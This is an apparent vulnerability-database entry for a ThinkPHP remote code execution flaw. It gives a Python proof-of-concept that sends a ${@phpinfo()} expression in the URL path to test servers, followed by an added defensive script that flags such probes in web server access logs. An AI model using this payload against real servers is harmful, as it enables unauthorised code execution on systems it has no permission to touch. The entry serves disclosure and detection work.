
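ThinkPHP Framework Code Execution Vulnerability

Vulnerability information

Vulnerability ID: JDSEC-POC-2014-1128-3233

Vulnerability name: ThinkPHP framework code execution vulnerability

Submitted by: 0x0F

Submission date: 2014-11-29 08:45:13

Source: http://www.2cto.com/Article/201206/134199.html

Vulnerability description

ThinkPHP code execution vulnerability

PoC details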

#coding=utf-8

import requests


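def run(target):
    """Check a host for the ThinkPHP code execution vulnerability.

    Returns a list holding the probe URL if the host responded as vulnerable.
    """
    results = []
    # Probe URL: a ${@phpinfo()} expression placed in the last path segment.
    url = "http://" + target + "/index.php/module/aciton/param1/${@phpinfo()}"
    try:
        r = requests.get(url, timeout=5)
    except Exception:
        # Unreachable host or timeout: report nothing for this target.
        pass
    else:
        r.close()
        # The phpinfo() page title in the body means the expression was evaluated.
        if r.status_code == 200 and "<title>phpinfo()</title>" in r.text:
            results.append(url)

    return results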
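
Added example (not part of the original PoC submission): a log check for requests shaped like the probe URL above, that is, a ${...} expression inside the request path, including percent-encoded forms. It assumes a common/combined-format web server access log; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request line inside a common/combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# "${" ... "}": the expression syntax the probe URL places in a path segment.
EXPR_RE = re.compile(r'\$\{[^}]*\}')


def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so %24%7B and %2524%257B are both seen as ${."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_probes(log_lines):
    """Return (client_ip, decoded_path, expression) for each suspicious request."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue  # malformed or non-HTTP entry
        # Only the path is inspected; the query string is dropped first.
        path = decode_fully(match.group("target").split("?", 1)[0])
        expr = EXPR_RE.search(path)
        if expr:
            hits.append((line.split(" ", 1)[0], path, expr.group(0)))
    return hits


# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [29/Nov/2014:08:45:13 +0800] "GET /index.php/module/aciton/param1/${@phpinfo()} HTTP/1.1" 200 51234',
    '192.0.2.11 - - [29/Nov/2014:08:46:02 +0800] "GET /index.php/module/action/param1/%24%7B%40phpinfo()%7D HTTP/1.1" 200 51234',
    '198.51.100.7 - - [29/Nov/2014:08:47:40 +0800] "GET /index.php/news/read/id/42 HTTP/1.1" 200 8123',
    '198.51.100.8 - - [29/Nov/2014:08:48:10 +0800] "GET /index.php/news/read/id/42?q=${x} HTTP/1.1" 200 8123',
]

if __name__ == "__main__":
    for ip, path, expr in find_probes(SAMPLE_LOG):
        print(ip, path, expr)
```

A hit with status 200 and a large response size is worth checking against the response body for the phpinfo() page title that the PoC looks for.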